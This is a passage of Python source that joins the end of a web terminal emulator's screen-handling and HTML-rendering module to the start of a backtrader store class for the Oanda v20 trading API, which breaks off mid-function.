(VPA) - Moves the cursor to given line. """ n = int(n) self.cursorY = n - 1 def clear_screen(self): """ Clears the screen. Also used to emulate a terminal reset. .. note:: The current rendition (self.cur_rendition) will be applied to all characters on the screen when this function is called. """ logging.debug('clear_screen()') self.scroll_up(len(self.screen) - 1) self.init_screen() self.init_renditions(self.cur_rendition) self.cursorX = 0 self.cursorY = 0 def clear_screen_from_cursor_down(self): """ Clears the screen from the cursor down (ESC[J or ESC[0J). .. note:: This method actually erases from the cursor position to the end of the screen. """ #logging.debug('clear_screen_from_cursor_down()') self.clear_line_from_cursor_right() if self.cursorY == self.rows - 1: # Bottom of screen; nothing to do return self.screen[self.cursorY+1:] = [ array('u', u' ' * self.cols) for a in self.screen[self.cursorY+1:] ] c = self.cur_rendition # Just to save space below self.renditions[self.cursorY+1:] = [ array('u', c * self.cols) for a in self.renditions[self.cursorY+1:] ] def clear_screen_from_cursor_up(self): """ Clears the screen from the cursor up (ESC[1J). """ #logging.debug('clear_screen_from_cursor_up()') self.screen[:self.cursorY+1] = [ array('u', u' ' * self.cols) for a in self.screen[:self.cursorY] ] c = self.cur_rendition self.renditions[:self.cursorY+1] = [ array('u', c * self.cols) for a in self.renditions[:self.cursorY] ] self.cursorY = 0 def clear_screen_from_cursor(self, n): """ CSI *n* J ED (Erase Data). This escape sequence uses the following rules: ====== ============================= === Esc[J Clear screen from cursor down ED0 Esc[0J Clear screen from cursor down ED0 Esc[1J Clear screen from cursor up ED1 Esc[2J Clear entire screen ED2 ====== ============================= === """ #logging.debug('clear_screen_from_cursor(%s)' % n) try: n = int(n) except ValueError: # Esc[J n = 0 clear_types = { 0: self.clear_screen_from_cursor_down, 1: self.clear_screen_from_cursor_up, 2: self.clear_screen } try: clear_types[n]() except KeyError: logging.error(_("Error: Unsupported number for escape sequence J")) # Execute our callbacks try: for callback in self.callbacks[CALLBACK_CHANGED].values(): callback() except TypeError: pass try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def clear_line_from_cursor_right(self): """ Clears the screen from the cursor right (ESC[K or ESC[0K). """ #logging.debug("clear_line_from_cursor_right()") saved = self.screen[self.cursorY][:self.cursorX] saved_renditions = self.renditions[self.cursorY][:self.cursorX] spaces = array('u', u' '*len(self.screen[self.cursorY][self.cursorX:])) renditions = array('u', self.cur_rendition * len(self.screen[self.cursorY][self.cursorX:])) self.screen[self.cursorY] = saved + spaces # Reset the cursor position's rendition to the end of the line self.renditions[self.cursorY] = saved_renditions + renditions def clear_line_from_cursor_left(self): """ Clears the screen from the cursor left (ESC[1K). """ #logging.debug("clear_line_from_cursor_left()") saved = self.screen[self.cursorY][self.cursorX:] saved_renditions = self.renditions[self.cursorY][self.cursorX:] spaces = array('u', u' '*len(self.screen[self.cursorY][:self.cursorX])) renditions = array('u', self.cur_rendition * len(self.screen[self.cursorY][:self.cursorX])) self.screen[self.cursorY] = spaces + saved self.renditions[self.cursorY] = renditions + saved_renditions def clear_line(self): """ Clears the entire line (ESC[2K). """ #logging.debug("clear_line()") self.screen[self.cursorY] = array('u', u' ' * self.cols) c = self.cur_rendition self.renditions[self.cursorY] = array('u', c * self.cols) self.cursorX = 0 def clear_line_from_cursor(self, n): """ CSI*n*K EL (Erase in Line). This escape sequence uses the following rules: ====== ============================== === Esc[K Clear screen from cursor right EL0 Esc[0K Clear screen from cursor right EL0 Esc[1K Clear screen from cursor left EL1 Esc[2K Clear entire line ED2 ====== ============================== === """ #logging.debug('clear_line_from_cursor(%s)' % n) try: n = int(n) except ValueError: # Esc[J n = 0 clear_types = { 0: self.clear_line_from_cursor_right, 1: self.clear_line_from_cursor_left, 2: self.clear_line } try: clear_types[n]() except KeyError: logging.error(_( "Error: Unsupported number for CSI escape sequence K")) # Execute our callbacks try: for callback in self.callbacks[CALLBACK_CHANGED].values(): callback() except TypeError: pass try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def set_led_state(self, n): """ Sets the values the dict, self.leds depending on *n* using the following rules: ====== ====================== ====== Esc[0q Turn off all four leds DECLL0 Esc[1q Turn on LED #1 DECLL1 Esc[2q Turn on LED #2 DECLL2 Esc[3q Turn on LED #3 DECLL3 Esc[4q Turn on LED #4 DECLL4 ====== ====================== ====== .. note:: These aren't implemented in Gate One's GUI (yet) but they certainly kept track of! """ logging.debug("set_led_state(%s)" % n) leds = n.split(';') for led in leds: led = int(led) if led == 0: self.leds[1] = False self.leds[2] = False self.leds[3] = False self.leds[4] = False else: self.leds[led] = True try: for callback in self.callbacks[CALLBACK_LEDS].values(): callback(led) except TypeError: pass def _set_rendition(self, n): """ Sets :attr:`self.renditions[self.cursorY][self.cursorX]` equal to *n.split(';')*. *n* is expected to be a string of ECMA-48 rendition numbers separated by semicolons. Example:: '0;1;31' ...will result in:: [0, 1, 31] Note that the numbers were converted to integers and the order was preserved. """ #logging.debug("_set_rendition(%s)" % n) cursorY = self.cursorY cursorX = self.cursorX if cursorX >= self.cols: # We're at the end of the row try: if len(self.renditions[cursorY]) <= cursorX: # Make it all longer self.renditions[cursorY].append(u' ') # Make it longer self.screen[cursorY].append(u'\x00') # This needs to match except IndexError: # This can happen if the rate limiter kicks in and starts # cutting off escape sequences at random. return # Don't bother attempting to process anything else if cursorY >= self.rows: logging.error(_( "cursorY >= self.rows! This is either a bug or just a symptom " "of the rate limiter kicking in.")) return # Don't bother setting renditions past the bottom if not n: # or \x1b[m (reset) # First char in PUA Plane 16 is always the default: self.cur_rendition = unichr(1000) # Should be reset (e.g. [0]) return # No need for further processing; save some CPU # Convert the string (e.g. '0;1;32') to a list (e.g. [0,1,32] new_renditions = [int(a) for a in n.split(';') if a != ''] # Handle 256-color renditions by getting rid of the (38|48);5 part and # incrementing foregrounds by 1000 and backgrounds by 10000 so we can # tell them apart in _spanify_screen(). try: if 38 in new_renditions: foreground_index = new_renditions.index(38) if len(new_renditions[foreground_index:]) >= 2: if new_renditions[foreground_index+1] == 5: # This is a valid 256-color rendition (38;5;<num>) new_renditions.pop(foreground_index) # Goodbye 38 new_renditions.pop(foreground_index) # Goodbye 5 new_renditions[foreground_index] += 1000 if 48 in new_renditions: background_index = new_renditions.index(48) if len(new_renditions[background_index:]) >= 2: if new_renditions[background_index+1] == 5: # This is a valid 256-color rendition (48;5;<num>) new_renditions.pop(background_index) # Goodbye 48 new_renditions.pop(background_index) # Goodbye 5 new_renditions[background_index] += 10000 except IndexError: # Likely that the rate limiter has caused all sorts of havoc with # escape sequences. Just ignore it and halt further processing return out_renditions = [] for rend in new_renditions: if rend == 0: out_renditions = [0] else: out_renditions.append(rend) if out_renditions[0] == 0: # If it starts with 0 there's no need to combine it with the # previous rendition... reduced = _reduce_renditions(out_renditions) if reduced not in self.renditions_store.values(): new_ref_point = next(self.rend_counter) self.renditions_store.update({new_ref_point: reduced}) self.cur_rendition = new_ref_point else: # Find the right reference point to use for k, v in self.renditions_store.items(): if reduced == v: self.cur_rendition = k return new_renditions = out_renditions cur_rendition_list = self.renditions_store[self.cur_rendition] reduced = _reduce_renditions(cur_rendition_list + new_renditions) if reduced not in self.renditions_store.values(): new_ref_point = next(self.rend_counter) self.renditions_store.update({new_ref_point: reduced}) self.cur_rendition = new_ref_point else: # Find the right reference point to use for k, v in self.renditions_store.items(): if reduced == v: self.cur_rendition = k def _opt_handler(self, chars): """ Optional special escape sequence handler for sequences matching RE_OPT_SEQ. If CALLBACK_OPT is defined it will be called like so:: self.callbacks[CALLBACK_OPT](chars) Applications can use this escape sequence to define whatever special handlers they like. It works like this: If an escape sequence is encountered matching RE_OPT_SEQ this method will be called with the inbetween *chars* (e.g. \x1b]_;<chars>\x07) as the argument. Applications can then do what they wish with *chars*. .. note:: I added this functionality so that plugin authors would have a mechanism to communicate with terminal applications. See the SSH plugin for an example of how this can be done (there's channels of communication amongst ssh_connect.py, ssh.js, and ssh.py). """ try: for callback in self.callbacks[CALLBACK_OPT].values(): callback(chars) except TypeError: # High likelyhood that nothing is defined. No biggie. pass # NOTE: This was something I was testing to simplify the code. It works # (mostly) but the performance was TERRIBLE. Still needs investigation... #def _classify_renditions(self): #""" #Returns ``self.renditions`` as a list of HTML classes for each position. #""" #return [[map(RENDITION_CLASSES.get, rend) for rend in map( #self.renditions_store.get, rendition)] #for rendition in self.renditions] #def _spanify_line(self, line, rendition, current_classes=None, cursor=False): #""" #Returns a string containing *line* with HTML spans applied representing #*renditions*. #""" #outline = "" #reset_classes = RESET_CLASSES # TODO #html_entities = {"&": "&amp;", '<': '&lt;', '>': '&gt;'} #foregrounds = ('f0','f1','f2','f3','f4','f5','f6','f7') #backgrounds = ('b0','b1','b2','b3','b4','b5','b6','b7') #prev_rendition = None #if current_classes: #outline += '<span class="%s%s">' % ( #self.class_prefix, #(" %s" % self.class_prefix).join(current_classes)) #charcount = 0 #for char, rend in izip(line, rendition): #changed = True #if char in "&<>": ## Have to convert ampersands and lt/gt to HTML entities #char = html_entities[char] #if rend == prev_rendition: ## Shortcut... So we can skip all the logic below #changed = False #else: #prev_rendition = rend #if changed: #outline += "</span>" #current_classes = [a for a in rend if a and 'reset' not in a] ##if rend and rend[0] == 'reset': ##if len(current_classes) > 1: ##classes = ( ##" %s" % self.class_prefix).join(current_classes) ##else: #classes = (" %s" % self.class_prefix).join(current_classes) #if current_classes != ['reset']: #outline += '<span class="%s%s">' % ( #self.class_prefix, classes) #if cursor and charcount == cursor: #outline += '<span class="%scursor">%s</span>' % ( #self.class_prefix, char) #else: #outline += char #charcount += 1 #open_spans = outline.count('<span') #close_spans = outline.count('</span') #if open_spans != close_spans: #for i in xrange(open_spans - close_spans): #outline += '</span>' #return current_classes, outline #def _spanify_screen_test(self): #""" #Iterates over the lines in *screen* and *renditions*, applying HTML #markup (span tags) where appropriate and returns the result as a list of #lines. It also marks the cursor position via a <span> tag at the #appropriate location. #""" ##logging.debug("_spanify_screen()") #results = [] ## NOTE: Why these duplicates of self.* and globals? Local variable ## lookups are faster--especially in loops. #special = SPECIAL ##rendition_classes = RENDITION_CLASSES #html_cache = HTML_CACHE #has_cache = isinstance(html_cache, AutoExpireDict) #screen = self.screen #renditions = self.renditions #renditions_store = self.renditions_store #classified_renditions = self._classify_renditions() #cursorX = self.cursorX #cursorY = self.cursorY #show_cursor = self.expanded_modes['25'] ##spancount = 0 #current_classes = [] ##prev_rendition = None ##foregrounds = ('f0','f1','f2','f3','f4','f5','f6','f7') ##backgrounds = ('b0','b1','b2','b3','b4','b5','b6','b7') ##html_entities = {"&": "&amp;", '<': '&lt;', '>': '&gt;'} #cursor_span = '<span class="%scursor">' % self.class_prefix #for linecount, line in enumerate(screen): #rendition = classified_renditions[linecount] #combined = (line + renditions[linecount]).tounicode() #if has_cache and combined in html_cache: ## Always re-render the line with the cursor (or just had it) #if cursor_span not in html_cache[combined]: ## Use the cache... #results.append(html_cache[combined]) #continue #if not len(line.tounicode().rstrip()) and linecount != cursorY: #results.append(line.tounicode()) #continue # Line is empty so we don't need to process renditions #if linecount == cursorY and show_cursor: #current_classes, outline = self._spanify_line( #line, rendition, #current_classes=current_classes, #cursor=cursorX) #else: #current_classes, outline = self._spanify_line( #line, rendition, #current_classes=current_classes, #cursor=False) #if outline: #results.append(outline) #if html_cache: #html_cache[combined] = outline #else: #results.append(None) # null is less memory than spaces ## NOTE: The client has been programmed to treat None (aka null in ## JavaScript) as blank lines. #return results def _spanify_screen(self): """ Iterates over the lines in *screen* and *renditions*, applying HTML markup (span tags) where appropriate and returns the result as a list of lines. It also marks the cursor position via a <span> tag at the appropriate location. """ #logging.debug("_spanify_screen()") results = [] # NOTE: Why these duplicates of self.* and globals? Local variable # lookups are faster--especially in loops. special = SPECIAL rendition_classes = RENDITION_CLASSES html_cache = HTML_CACHE has_cache = isinstance(html_cache, AutoExpireDict) screen = self.screen renditions = self.renditions renditions_store = self.renditions_store cursorX = self.cursorX cursorY = self.cursorY show_cursor = self.expanded_modes['25'] spancount = 0 current_classes = set() prev_rendition = None foregrounds = ('f0','f1','f2','f3','f4','f5','f6','f7') backgrounds = ('b0','b1','b2','b3','b4','b5','b6','b7') html_entities = {"&": "&amp;", '<': '&lt;', '>': '&gt;'} cursor_span = '<span class="%scursor">' % self.class_prefix for linecount, line in enumerate(screen): rendition = renditions[linecount] line_chars = line.tounicode() combined = line_chars + rendition.tounicode() cursor_line = True if linecount == cursorY else False if not cursor_line and has_cache and combined in html_cache: # Always re-render the line with the cursor (or just had it) if cursor_span not in html_cache[combined]: # Use the cache... results.append(html_cache[combined]) continue if not len(line_chars.rstrip()) and not cursor_line: results.append(line_chars) continue # Line is empty so we don't need to process renditions outline = "" if current_classes: outline += '<span class="%s%s">' % ( self.class_prefix, (" %s" % self.class_prefix).join(current_classes)) charcount = 0 for char, rend in izip(line, rendition): rend = renditions_store[rend] # Get actual rendition if ord(char) >= special: # Special stuff =) # Obviously, not really a single character if char in self.captured_files: outline += self.captured_files[char].html() continue changed = True if char in "&<>": # Have to convert ampersands and lt/gt to HTML entities char = html_entities[char] if rend == prev_rendition: # Shortcut... So we can skip all the logic below changed = False else: prev_rendition = rend if changed and rend: classes = imap(rendition_classes.get, rend) for _class in classes: if _class and _class not in current_classes: # Something changed... Start a new span if spancount: outline += "</span>" spancount -= 1 if 'reset' in _class: if _class == 'reset': current_classes = set() if spancount: for i in xrange(spancount): outline += "</span>" spancount = 0 else: reset_class = _class.split('reset')[0] if reset_class == 'foreground': [current_classes.remove(a) for a in current_classes if a in foregrounds] elif reset_class == 'background': [current_classes.remove(a) for a in current_classes if a in backgrounds] elif reset_class in current_classes: current_classes.remove(reset_class) else: if _class in foregrounds: [current_classes.remove(a) for a in current_classes if a in foregrounds] elif _class in backgrounds: [current_classes.remove(a) for a in current_classes if a in backgrounds] current_classes.add(_class) if current_classes: outline += '<span class="%s%s">' % ( self.class_prefix, (" %s" % self.class_prefix).join(current_classes)) spancount += 1 if cursor_line and show_cursor and charcount == cursorX: outline += '<span class="%scursor">%s</span>' % ( self.class_prefix, char) else: outline += char charcount += 1 if outline: # Make sure all renditions terminate at the end of the line for whatever in xrange(spancount): outline += "</span>" results.append(outline) if has_cache: html_cache[combined] = outline else: results.append(None) # null is shorter than spaces # NOTE: The client has been programmed to treat None (aka null in # JavaScript) as blank lines. for whatever in xrange(spancount): # Bit of cleanup to be safe results[-1] += "</span>" return results def _spanify_scrollback(self): """ Spanifies (turns renditions into `<span>` elements) everything inside `self.scrollback` using `self.renditions`. This differs from `_spanify_screen` in that it doesn't apply any logic to detect the location of the cursor (to make it just a tiny bit faster). """ # NOTE: See the comments in _spanify_screen() for details on this logic results = [] special = SPECIAL html_cache = HTML_CACHE has_cache = isinstance(html_cache, AutoExpireDict) screen = self.scrollback_buf renditions = self.scrollback_renditions rendition_classes = RENDITION_CLASSES renditions_store = self.renditions_store spancount = 0 current_classes = set() prev_rendition = None foregrounds = ('f0','f1','f2','f3','f4','f5','f6','f7') backgrounds = ('b0','b1','b2','b3','b4','b5','b6','b7') html_entities = {"&": "&amp;", '<': '&lt;', '>': '&gt;'} cursor_span = '<span class="%scursor">' % self.class_prefix for line, rendition in izip(screen, renditions): combined = (line + rendition).tounicode() if has_cache and combined in html_cache: # Most lines should be in the cache because they were rendered # while they were on the screen. if cursor_span not in html_cache[combined]: results.append(html_cache[combined]) continue if not len(line.tounicode().rstrip()): results.append(line.tounicode()) continue # Line is empty so we don't need to process renditions outline = "" if current_classes: outline += '<span class="%s%s">' % ( self.class_prefix, (" %s" % self.class_prefix).join(current_classes)) for char, rend in izip(line, rendition): rend = renditions_store[rend] # Get actual rendition if ord(char) >= special: # Special stuff =) # Obviously, not really a single character if char in self.captured_files: outline += self.captured_files[char].html() continue changed = True if char in "&<>": # Have to convert ampersands and lt/gt to HTML entities char = html_entities[char] if rend == prev_rendition: changed = False else: prev_rendition = rend if changed and rend != None: classes = imap(rendition_classes.get, rend) for _class in classes: if _class and _class not in current_classes: if spancount: outline += "</span>" spancount -= 1 if 'reset' in _class: if _class == 'reset': current_classes = set() else: reset_class = _class.split('reset')[0] if reset_class == 'foreground': [current_classes.remove(a) for a in current_classes if a in foregrounds] elif reset_class == 'background': [current_classes.remove(a) for a in current_classes if a in backgrounds] elif reset_class in current_classes: current_classes.remove(reset_class) else: if _class in foregrounds: [current_classes.remove(a) for a in current_classes if a in foregrounds] elif _class in backgrounds: [current_classes.remove(a) for a in current_classes if a in backgrounds] current_classes.add(_class) if current_classes: outline += '<span class="%s%s">' % ( self.class_prefix, (" %s" % self.class_prefix).join(current_classes)) spancount += 1 outline += char if outline: # Make sure all renditions terminate at the end of the line for whatever in xrange(spancount): outline += "</span>" results.append(outline) else: results.append(None) for whatever in xrange(spancount): # Bit of cleanup to be safe results[-1] += "</span>" return results def dump_html(self, renditions=True): """ Dumps the terminal screen as a list of HTML-formatted lines. If *renditions* is True (default) then terminal renditions will be converted into HTML <span> elements so they will be displayed properly in a browser. Otherwise only the cursor <span> will be added to mark its location. .. note:: This places <span class="cursor">(current character)</span> around the cursor location. """ if renditions: # i.e. Use stylized text (the default) screen = self._spanify_screen() scrollback = [] if self.scrollback_buf: scrollback = self._spanify_scrollback() else: cursorX = self.cursorX cursorY = self.cursorY screen = [] for y, row in enumerate(self.screen): if y == cursorY: cursor_row = "" for x, char in enumerate(row): if x == cursorX: cursor_row += ( '<span class="%scursor">%s</span>' % ( self.class_prefix, char)) else: cursor_row += char screen.append(cursor_row) else: screen.append("".join(row)) scrollback = [a.tounicode() for a in self.scrollback_buf] # Empty the scrollback buffer: self.init_scrollback() self.modified = False return (scrollback, screen) # NOTE: This is a work-in-progress. Don't use it. def dump_html_async(self, identifier=None, renditions=True, callback=None): """ Dumps the terminal screen as a list of HTML-formatted lines. If *renditions* is True (default) then terminal renditions will be converted into HTML <span> elements so they will be displayed properly in a browser. Otherwise only the cursor <span> will be added to mark its location. .. note:: This places <span class="cursor">(current character)</span> around the cursor location. """ if self.async: state_obj = { 'html_cache': HTML_CACHE, 'screen': self.screen, 'renditions': self.renditions, 'renditions_store': self.renditions_store, 'cursorX': self.cursorX, 'cursorY': self.cursorY, 'show_cursor': self.expanded_modes['25'], 'class_prefix': self.class_prefix } self.async.call_singleton( spanify_screen, identifier, state_obj, callback=callback) else: scrollback, screen = self.dump_html(renditions=renditions) callback(scrollback, screen) def dump_plain(self): """ Dumps the screen and the scrollback buffer as-is then empties the scrollback buffer. """ screen = self.screen scrollback = self.scrollback_buf # Empty the scrollback buffer: self.init_scrollback() self.modified = False return (scrollback, screen) def dump_components(self): """ Dumps the screen and renditions as-is, the scrollback buffer as HTML, and the current cursor coordinates. Also, empties the scrollback buffer .. note:: This was used in some performance-related experiments but might be useful for other patterns in the future so I've left it here. """ screen = [a.tounicode() for a in self.screen] scrollback = [] if self.scrollback_buf: # Process the scrollback buffer into HTML scrollback = self._spanify_scrollback( self.scrollback_buf, self.scrollback_renditions) # Empty the scrollback buffer: self.init_scrollback() self.modified = False return (scrollback, screen, self.renditions, self.cursorY, self.cursorX) def dump(self): """ Returns self.screen as a list of strings with no formatting. No scrollback buffer. No renditions. It is meant to be used to get a quick glance of what is being displayed (when debugging). .. note:: This method does not empty the scrollback buffer. """ out = [] for line in self.screen: line_out = "" for char in line: if len(char) > 1: # This is an image (or similar) line_out += u'⬚' # Use a dotted square as a placeholder else: line_out += char out.append(line_out) self.modified = False return out # This is here to make it easier for someone to produce an HTML app that uses # terminal.py def css_renditions(selector=None): """ Returns a (long) string containing all the CSS styles in order to support terminal text renditions (different colors, bold, etc) in an HTML terminal using the dump_html() function. If *selector* is provided, all styles will be prefixed with said selector like so:: ${selector} span.f0 { color: #5C5C5C; } Example:: >>> css_renditions("#gateone").splitlines()[7] '#gateone span.f0 { color: #5C5C5C; } /* Black */' """ from string import Template # Try looking for the fallback CSS template in two locations: # * The same directory that holds terminal.py # * A 'templates' directory in the same location as terminal.py template_name = 'terminal_renditions_fallback.css' template_path = os.path.join(os.path.split(__file__)[0], template_name) if not os.path.exists(template_path): # Try looking in a 'templates' directory template_path = os.path.join( os.path.split(__file__)[0], 'templates', template_name) if not os.path.exists(template_path): raise IOError("File not found: %s" % template_name) with open(template_path) as f: css = f.read() renditions_template = Template(css) return renditions_template.substitute(selector=selector)
oandav20store.py
#!/usr/bin/env python from __future__ import (absolute_import, division, print_function, unicode_literals) import collections import json import threading import copy import time as _time from datetime import datetime, timedelta import v20 import backtrader as bt from backtrader.metabase import MetaParams from backtrader.utils.py3 import queue, with_metaclass class SerializableEvent(object): '''A threading.Event that can be serialized.''' def __init__(self): self.evt = threading.Event() def set(self): return self.evt.set() def clear(self): return self.evt.clear() def isSet(self): return self.evt.isSet() def wait(self, timeout=0): return self.evt.wait(timeout) def __getstate__(self): d = copy.copy(self.__dict__) if self.evt.isSet(): d['evt'] = True else: d['evt'] = False return d def __setstate__(self, d): self.evt = threading.Event() if d['evt']: self.evt.set() class MetaSingleton(MetaParams): '''Metaclass to make a metaclassed class a singleton''' def __init__(cls, name, bases, dct): super(MetaSingleton, cls).__init__(name, bases, dct) cls._singleton = None def __call__(cls, *args, **kwargs): if cls._singleton is None: cls._singleton = ( super(MetaSingleton, cls).__call__(*args, **kwargs)) return cls._singleton class OandaV20Store(with_metaclass(MetaSingleton, object)): '''Singleton class wrapping to control the connections to Oanda v20. Params: - ``token`` (default:``None``): API access token - ``account`` (default: ``None``): account id - ``practice`` (default: ``False``): use the test environment - ``account_poll_freq`` (default: ``10.0``): refresh frequency for account value/cash refresh - ``stream_timeout`` (default: ``10``): timeout for stream requests - ``poll_timeout`` (default: ``2``): timeout for poll requests ''' params = ( ('token', ''), ('account', ''), ('practice', False), ('account_poll_freq', 10.0), # account balance refresh timeout ('stream_timeout', 10), ('poll_timeout', 2), ) BrokerCls = None # broker class will auto register DataCls = None # data class will auto register # Oanda supported granularities '''S5, S10, S15, S30, M1, M2, M3, M4, M5, M10, M15, M30, H1, H2, H3, H4, H6, H8, H12, D, W, M''' _GRANULARITIES = { (bt.TimeFrame.Seconds, 5): 'S5', (bt.TimeFrame.Seconds, 10): 'S10', (bt.TimeFrame.Seconds, 15): 'S15', (bt.TimeFrame.Seconds, 30): 'S30', (bt.TimeFrame.Minutes, 1): 'M1', (bt.TimeFrame.Minutes, 2): 'M2', (bt.TimeFrame.Minutes, 3): 'M3', (bt.TimeFrame.Minutes, 4): 'M4', (bt.TimeFrame.Minutes, 5): 'M5', (bt.TimeFrame.Minutes, 10): 'M10', (bt.TimeFrame.Minutes, 15): 'M15', (bt.TimeFrame.Minutes, 30): 'M30', (bt.TimeFrame.Minutes, 60): 'H1', (bt.TimeFrame.Minutes, 120): 'H2', (bt.TimeFrame.Minutes, 180): 'H3', (bt.TimeFrame.Minutes, 240): 'H4', (bt.TimeFrame.Minutes, 360): 'H6', (bt.TimeFrame.Minutes, 480): 'H8', (bt.TimeFrame.Minutes, 720): 'H12', (bt.TimeFrame.Days, 1): 'D', (bt.TimeFrame.Weeks, 1): 'W', (bt.TimeFrame.Months, 1): 'M', } # Order type matching with oanda _ORDEREXECS = { bt.Order.Market: 'MARKET', bt.Order.Limit: 'LIMIT', bt.Order.Stop: 'STOP', bt.Order.StopLimit: 'STOP', } # Oanda api endpoints _OAPI_URL = ["api-fxtrade.oanda.com", "api-fxpractice.oanda.com"] _OAPI_STREAM_URL = ["stream-fxtrade.oanda.com", "stream-fxpractice.oanda.com"] @classmethod def getdata(cls, *args, **kwargs): '''Returns ``DataCls`` with args, kwargs''' return cls.DataCls(*args, **kwargs) @classmethod def getbroker(cls, *args, **kwargs): '''Returns broker with *args, **kwargs from registered ``BrokerCls``''' return cls.BrokerCls(*args, **kwargs) def __init__(self): '''Initialization''' super(OandaV20Store, self).__init__() self.notifs = collections.deque() # store notifications for cerebro self._cash = 0.0 # margin available, currently available cash self._value = 0.0 # account balance self._currency = None # account currency self.broker = None # broker instance self.datas = list() # datas that have registered over start self._env = None # reference to cerebro for general notifications self._evt_acct = SerializableEvent() self._orders = collections.OrderedDict() # map order.ref to order id # init oanda v20 api context self.oapi = v20.Context( self._OAPI_URL[int(self.p.practice)], poll_timeout=self.p.poll_timeout, port=443, ssl=True, token=self.p.token, datetime_format="UNIX", ) # init oanda v20 api stream context self.oapi_stream = v20.Context( self._OAPI_STREAM_URL[int(self.p.practice)], stream_timeout=self.p.stream_timeout, port=443, ssl=True, token=self.p.token, datetime_format="UNIX", ) def start(self, data=None, broker=None): # Datas require some processing to kickstart data reception if data is None and broker is None: self.cash = None return if data is not None: self._env = data._env # For datas simulate a queue with None to kickstart co self.datas.append(data) if self.broker is not None: self.broker.data_started(data) elif broker is not None: self.broker = broker self.streaming_events() self.broker_threads() def stop(self): # signal end of thread if self.broker is not None: self.q_ordercreate.put(None) self.q_orderclose.put(None) self.q_account.put(None) def put_notification(self, msg, *args, **kwargs): '''Adds a notification''' self.notifs.append((msg, args, kwargs)) def get_notifications(self): '''Return the pending "store" notifications''' self.notifs.append(None) # put a mark / threads could still append return [x for x in iter(self.notifs.popleft, None)] def get_positions(self): '''Returns the currently open positions''' try: response = self.oapi.position.list_open(self.p.account) pos = response.get('positions', 200) # convert positions to dict for idx, val in enumerate(pos): pos[idx] = val.dict() except Exception as e: self.put_notification(e) return None return pos def get_granularity(self, timeframe, compression): '''Returns the granularity useable for oanda''' return self._GRANULARITIES.get((timeframe, compression), None) def get_instrument(self, dataname): '''Returns details about the requested instrument''' try: response = self.oapi.account.instruments(self.p.account, instruments=dataname) inst = response.get('instruments', 200) # convert instrumens to dict for idx, val in enumerate(inst): inst[idx] = val.dict() except Exception as e: self.put_notification(e) return None return inst[0] or None def get_instruments(self, dataname): '''Returns details about available instruments''' try: response = self.oapi.account.instruments(self.p.account, instruments=dataname) inst = response.get('instruments', 200) # convert instrumens to dict for idx, val in enumerate(inst): inst[idx] = val.dict() except Exception as e: self.put_notification(e) return None return inst or None def get_pricing(self, dataname): '''Returns details about current price''' try: response = self.oapi.pricing.get(self.p.account, instruments=dataname) prices = response.get('prices', 200) # convert prices to dict for idx, val in enumerate(prices): prices[idx] = val.dict() except Exception as e: self.put_notification(e) return None return prices[0] or None def get_pricings(self, dataname): '''Returns details about current prices''' try: response = self.oapi.pricing.get(self.p.account, instruments=dataname) prices = response.get('prices', 200) # convert prices to dict for idx, val in enumerate(prices): prices[idx] = val.dict() except Exception as e: self.put_notification(e) return None return prices or None def get_cash(self): '''Returns the available cash''' return self._cash def get_value(self): '''Returns the account balance''' return self._value def get_currency(self): '''Returns the currency of the account''' return self._currency def broker_threads(self): '''Creates threads for broker functionality''' self.q_account = queue.Queue() self.q_account.put(True) # force an immediate update t = threading.Thread(target=self._t_account) t.daemon = True t.start() self.q_ordercreate = queue.Queue() t = threading.Thread(target=self._t_order_create) t.daemon = True t.start() self.q_orderclose = queue.Queue() t = threading.Thread(target=self._t_order_cancel) t.daemon = True t.start() # Wait once for the values to be set self._evt_acct.wait(self.p.account_poll_freq) def streaming_events(self, tmout=None): '''Creates threads for event streaming''' q = queue.Queue() kwargs = {'q': q, 'tmout': tmout} t = threading.Thread(target=self._t_streaming_events, kwargs=kwargs) t.daemon = True t.start() return q def streaming_prices(self, dataname, tmout=None): '''Creates threads for price streaming''' q = queue.Queue() kwargs = {'q': q, 'dataname': dataname, 'tmout': tmout} t = threading.Thread(target=self._t_streaming_prices, kwargs=kwargs) t.daemon = True t.start() return q def order_create(self, order, stopside=None, takeside=None, **kwargs): '''Creates an order''' okwargs = dict() okwargs['instrument'] = order.data._dataname okwargs['units'] = abs(int(order.created.size)) if order.isbuy() else -abs(int(order.created.size)) # negative for selling okwargs['type'] = self._ORDEREXECS[order.exectype] if order.exectype != bt.Order.Market: okwargs['price'] = format(order.created.price, '.%df' % order.data.contractdetails['displayPrecision']) if order.valid is None: okwargs['timeInForce'] = 'GTC' # good to cancel else: okwargs['timeInForce'] = 'GTD' # good to date gtdtime = order.data.num2date(order.valid) okwargs['gtdTime'] = gtdtime.strftime("%Y-%m-%dT%H:%M:%S.000000000Z") if order.exectype == bt.Order.StopLimit: okwargs['priceBound'] = order.created.pricelimit if order.exectype == bt.Order.StopTrail: okwargs['distance'] = order.trailamount if stopside is not None and stopside.price is not None: okwargs['stopLossOnFill'] = v20.transaction.StopLossDetails( price = format(stopside.price, '.%df' % order.data.contractdetails['displayPrecision']), clientExtensions = v20.transaction.ClientExtensions( id = str(stopside.ref) ).dict() ).dict() if takeside is not None and takeside.price is not None: okwargs['takeProfitOnFill'] = v20.transaction.TakeProfitDetails( price = format(takeside.price, '.%df' % order.data.contractdetails['displayPrecision']), clientExtensions = v20.transaction.ClientExtensions( id = str(takeside.ref) ).dict() ).dict() # store backtrader order ref in client extensions okwargs['clientExtensions'] = v20.transaction.ClientExtensions( id = str(order.ref) ).dict() okwargs.update(**kwargs) # anything from the user self.q_ordercreate.put((order.ref, okwargs,)) # notify orders of being submitted self.broker._submit(order.ref) if stopside is not None and stopside.price is not None: self.broker._submit(stopside.ref) if takeside is not None and takeside.price is not None: self.broker._submit(takeside.ref) return order def order_cancel(self, order): '''Cancels a order''' self.q_orderclose.put(order.ref) return order def candles(self, dataname, dtbegin, dtend, timeframe, compression, candleFormat, includeFirst=True, onlyComplete=True): '''Returns historical rates''' q = queue.Queue() kwargs = {'dataname': dataname, 'dtbegin': dtbegin, 'dtend': dtend, 'timeframe': timeframe, 'compression': compression, 'candleFormat': candleFormat, 'includeFirst': includeFirst, 'onlyComplete': onlyComplete, 'q': q} t = threading.Thread(target=self._t_candles, kwargs=kwargs) t.daemon = True t.start() return q def _t_streaming_events(self, q, tmout=None): '''Callback method for streaming events''' if tmout is not None: _time.sleep(tmout) try: response = self.oapi_stream.transaction.stream( self.p.account ) for msg_type, msg in response.parts(): if 